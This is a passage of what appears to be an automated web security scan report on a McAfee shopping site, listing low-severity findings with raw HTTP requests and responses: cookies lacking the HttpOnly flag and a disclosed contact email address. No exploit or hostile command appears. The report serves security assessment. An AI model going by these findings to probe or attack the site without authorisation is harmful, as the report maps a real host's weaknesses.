__utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:26 GMT
ETag: "5D7pOrfoUiY"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:25 GMT
Content-Length: 145

google_ad_client = "pub-9942530385485090";
/* 300x250 Image Only */
google_ad_slot = "7017966687";
google_ad_width = 300;
google_ad_height = 250;

4.216. http://secureshopping.mcafee.com/js/google_ads_7409232867.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/google_ads_7409232867.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/google_ads_7409232867.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUiS"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:27 GMT
Content-Length: 139

google_ad_client = "pub-9942530385485090";
/* Footer 728x90 */
google_ad_slot = "7409232867";
google_ad_width = 728;
google_ad_height = 90;

4.217. http://secureshopping.mcafee.com/js/mootools-1.2-core-nc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/mootools-1.2-core-nc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mootools-1.2-core-nc.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:26 GMT
ETag: "5D7pOrfosEl"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:25 GMT
Content-Length: 96542

/*
Script: Core.js
   MooTools - My Object Oriented JavaScript Tools.

License:
   MIT-style license.

Copyright:
   Copyright (c) 2006-2007 [Valerio Proietti](http://mad4milk.net/).

Code & Documentation:

...[SNIP]...

4.218. http://secureshopping.mcafee.com/legal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/legal.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.219. http://secureshopping.mcafee.com/link previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link?clckfrm=1&sn=SpyTown&u=http%3A%2F%2Fpartner.become.com%2Frd%3Fpartner%3Dmss%26q%3Dplasma%2Btv%26t%3Dpmr%26et%3Dex%26pt%3D%26pn%3D1%26pi%3D2%26ts%3D1293230933117%26lk%3D12264779%26bp%3D211255866%26id%3D%26bskuid%3D1089073597%26idx%3D2000%26pm%3D1%26cid%3D508%26binfo%3Dm43jsZOyI9Krqy5kRuoSUA%26brand%3DHWilson%26u%3DH4sIAAAAAAAAAL2NQQrCMBBFb%252BPut7gVRFBcimdI07ENTmaGZkL09gYEj%252BDq8%252BA%252F3upuh3FsrQ3F3q5Nhqh5NKKNqRQYT9hjroExhfiE63c5bAvhwcFhQYgRKXGSBVmrOPBj6xfqTC8nKUkFUblmAYbVM59s07lGT%252FPxH81dXIN0tefOl%252Fvt%252BgGs3T%252FO%252FwAAAA%253D%253D&cv=80 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.5.10.1293269981

Response

HTTP/1.1 301 Moved Permanently
Vary: Accept-Encoding
Server: McAfeeSecure
Location: http://partner.become.com/rd?partner=mss&q=plasma+tv&t=pmr&et=ex&pt=&pn=1&pi=2&ts=1293230933117&lk=12264779&bp=211255866&id=&bskuid=1089073597&idx=2000&pm=1&cid=508&binfo=m43jsZOyI9Krqy5kRuoSUA&brand=HWilson&u=H4sIAAAAAAAAAL2NQQrCMBBFb%2BPut7gVRFBcimdI07ENTmaGZkL09gYEj%2BDq8%2BA%2F3upuh3FsrQ3F3q5Nhqh5NKKNqRQYT9hjroExhfiE63c5bAvhwcFhQYgRKXGSBVmrOPBj6xfqTC8nKUkFUblmAYbVM59s07lGT%2FPxH81dXIN0tefOl%2Fvt%2BgGs3T%2FO%2FwAAAA%3D%3D
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Date: Sat, 25 Dec 2010 03:42:08 GMT

4.220. http://secureshopping.mcafee.com/merchants-intro.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/merchants-intro.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.221. http://secureshopping.mcafee.com/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:19 GMT
user=id=1293248423528-1-dMZf&ph=214267116; path=/; expires=Sun, 25-Dec-2011 03:53:19 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.222. http://secureshopping.mcafee.com/shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 301 Moved Permanently
Vary: Accept-Encoding
Server: McAfeeSecure
Location: /
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
Date: Sat, 25 Dec 2010 03:53:17 GMT

4.223. http://secureshopping.mcafee.com/shop/holiday-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.224. http://secureshopping.mcafee.com/shop/holiday-gifts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-gifts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.225. http://secureshopping.mcafee.com/shop/holiday-home-decor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-home-decor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5. Email addresses disclosed previous next
There are 178 instances of this issue:

/
/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920
/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776
/about.jsp
/browse/
/browse/baby/
/browse/baby/apparel/
/browse/baby/apparel/blankets/
/browse/baby/apparel/dresses-gowns/
/browse/baby/apparel/footwear/
/browse/baby/apparel/hats-caps/
/browse/baby/apparel/jackets/
/browse/baby/apparel/jumpsuits/
/browse/baby/apparel/layette/
/browse/baby/apparel/leggings-tights/
/browse/baby/apparel/pajamas/
/browse/baby/apparel/pants/
/browse/baby/apparel/shirts/
/browse/baby/apparel/sweaters/
/browse/baby/apparel/swimwear/
/browse/baby/bathing/
/browse/baby/bathing/bath-tubs/
/browse/baby/bathing/hooded-towels/
/browse/baby/bathing/lotion/
/browse/baby/bathing/potty-training/
/browse/baby/bathing/powder/
/browse/baby/bathing/shampoo/
/browse/baby/bathing/soap/
/browse/baby/bathing/washcloths/
/browse/baby/bedding/
/browse/baby/bedding/bedskirts/
/browse/baby/bedding/blankets/
/browse/baby/bedding/bumper-pads/
/browse/baby/bedding/comforters/
/browse/baby/bedding/crib-sets/
/browse/baby/bedding/hooded-towels/
/browse/baby/bedding/mattress-pads/
/browse/baby/bedding/sheets/
/browse/baby/bedding/washcloths/
/browse/baby/diapering/
/browse/baby/diapering/baby-wipes/
/browse/baby/diapering/diaper-bags/
/browse/baby/diapering/diaper-covers/
/browse/baby/diapering/diaper-storage-disposal/
/browse/baby/diapering/diapers/
/browse/baby/diapering/skin-care/
/browse/baby/feeding/
/browse/baby/feeding/baby-food-grinders/
/browse/baby/feeding/baby-food/
/browse/baby/feeding/bibs/
/browse/baby/feeding/bottles/
/browse/baby/feeding/breast-pumps/
/browse/baby/feeding/formula/
/browse/baby/feeding/milk-storage-bags/
/browse/baby/feeding/nipples/
/browse/baby/feeding/nursing-apparel/
/browse/baby/feeding/nursing-bras/
/browse/baby/feeding/nursing-pads/
/browse/baby/feeding/nursing-pillows/
/browse/baby/feeding/spoons-forks/
/browse/baby/furniture/
/browse/baby/furniture/bassinets/
/browse/baby/furniture/changing-tables/
/browse/baby/furniture/cribs/
/browse/baby/furniture/dressers/
/browse/baby/furniture/gliders-walkers/
/browse/baby/furniture/high-chairs/
/browse/baby/furniture/lamps-shades/
/browse/baby/furniture/mobiles/
/browse/baby/furniture/moses-baskets/
/browse/baby/furniture/night-lights/
/browse/baby/furniture/play-pens/
/browse/baby/furniture/rocking-chairs/
/browse/baby/furniture/swings-bouncers/
/browse/baby/furniture/toddler-bed/
/browse/baby/furniture/toy-chests/
/browse/baby/health/
/browse/baby/health/brushes-combs/
/browse/baby/health/diaper-rash-ointment/
/browse/baby/health/pacifiers/
/browse/baby/health/teethers/
/browse/baby/health/teething-relief/
/browse/baby/health/thermometers/
/browse/baby/health/toilet-training/
/browse/baby/safety/
/browse/baby/safety/baby-monitors/
/browse/baby/safety/bath-safety/
/browse/baby/safety/door-knob-covers/
/browse/baby/safety/drawer-cabinet-locks/
/browse/baby/safety/night-lights/
/browse/baby/safety/outlet-covers/
/browse/baby/safety/safety-gates/
/browse/baby/safety/safety-kits/
/browse/baby/toys/
/browse/baby/toys/activity-toys/
/browse/baby/toys/bath-toys/
/browse/baby/toys/learning-toys/
/browse/baby/toys/mobiles/
/browse/baby/toys/music-toys/
/browse/baby/toys/play-gyms-mats/
/browse/baby/toys/pull-along-toys/
/browse/baby/toys/rattles/
/browse/baby/toys/stuffed-toys/
/browse/baby/travel/
/browse/baby/travel/baby-carriers/
/browse/baby/travel/car-seats/
/browse/baby/travel/strollers/
/browse/clothing-accessories/
/browse/clothing-accessories/jewelry-watches/
/browse/collectibles-art/
/browse/computers/
/browse/computers/accessories/
/browse/computers/accessories/audio-video-accessories/
/browse/computers/accessories/bags,-cases-covers/
/browse/computers/accessories/batteries-chargers/
/browse/computers/accessories/camcorder-accessories/
/browse/computers/accessories/camera-accessories/
/browse/computers/accessories/camera-lenses/
/browse/computers/accessories/cell-phone-accessories/
/browse/computers/accessories/desktop-accessories/
/browse/computers/accessories/gps-accessories/
/browse/computers/accessories/headphones/
/browse/computers/accessories/microphones/
/browse/computers/accessories/monitor-accessories/
/browse/computers/accessories/mp3-player-accessories/
/browse/computers/accessories/notebook-pda-accessories/
/browse/computers/accessories/paper-supplies/
/browse/computers/accessories/printer-supplies/
/browse/computers/accessories/racks,-mounts-cabinets/
/browse/computers/accessories/remote-controls/
/browse/computers/accessories/scanner-accessories/
/browse/computers/accessories/storage-media/
/browse/computers/cables-adapters/
/browse/computers/cpu,-chassis-components/
/browse/computers/cpu,-chassis-components/cases/
/browse/computers/cpu,-chassis-components/cpu/
/browse/computers/cpu,-chassis-components/motherboards/
/browse/computers/desktops/
/browse/computers/graphics/
/browse/computers/handhelds-pda/
/browse/computers/input-devices/
/browse/computers/input-devices/joysticks-gamepads/
/browse/computers/input-devices/keyboards/
/browse/computers/input-devices/mice/
/browse/computers/monitors/
/browse/computers/network-communications/
/browse/computers/network-communications/adapters-interfaces/
/browse/computers/network-communications/bridges,-routers,-gateways/
/browse/computers/network-communications/modems/
/browse/computers/network-communications/network-hubs-switches/
/browse/computers/servers/terminals-thin-clients/
/browse/electronics/
/browse/electronics/digital-cameras/
/browse/food-wine/
/browse/health-beauty/
/browse/home-garden/
/browse/jewelry-watches/
/browse/magazines/
/browse/movies/
/browse/music/
/browse/office-products/
/browse/software/
/browse/sports-outdoors/
/browse/toys/
/browse/toys/cars,-trains-planes/
/browse/video-games/
/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577
/hot-products
/legal.jsp
/merchants-intro.jsp
/popular-searches
/rss/browse/baby/
/rss/browse/computers/
/rss/hot-products
/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116
/shop/holiday-cards
/shop/holiday-gifts
/shop/holiday-home-decor

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

5.1. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

GET / HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293247781225-3-y4N6; path=/; expires=Sun, 25-Dec-2011 03:29:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:29:40 GMT
Content-Length: 40883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Secure Online Shopping</title>
<meta name="d
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.2. http://secureshopping.mcafee.com/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.3. http://secureshopping.mcafee.com/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.4. http://secureshopping.mcafee.com/about.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/about.jsp

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:12 GMT
Content-Length: 9848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>About - McAfee Secure Shopping</title>
<meta name="description" conte
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.5. http://secureshopping.mcafee.com/browse/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:11 GMT
Content-Length: 47105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View All Categories at McAfee Secure Shopping - Search, Discover &amp
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.6. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.7. http://secureshopping.mcafee.com/browse/baby/apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.8. http://secureshopping.mcafee.com/browse/baby/apparel/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/blankets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.9. http://secureshopping.mcafee.com/browse/baby/apparel/dresses-gowns/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/dresses-gowns/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.10. http://secureshopping.mcafee.com/browse/baby/apparel/footwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/footwear/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.11. http://secureshopping.mcafee.com/browse/baby/apparel/hats-caps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/hats-caps/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.12. http://secureshopping.mcafee.com/browse/baby/apparel/jackets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jackets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.13. http://secureshopping.mcafee.com/browse/baby/apparel/jumpsuits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jumpsuits/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.14. http://secureshopping.mcafee.com/browse/baby/apparel/layette/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/layette/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.15. http://secureshopping.mcafee.com/browse/baby/apparel/leggings-tights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/leggings-tights/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.16. http://secureshopping.mcafee.com/browse/baby/apparel/pajamas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pajamas/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.17. http://secureshopping.mcafee.com/browse/baby/apparel/pants/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/pants/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

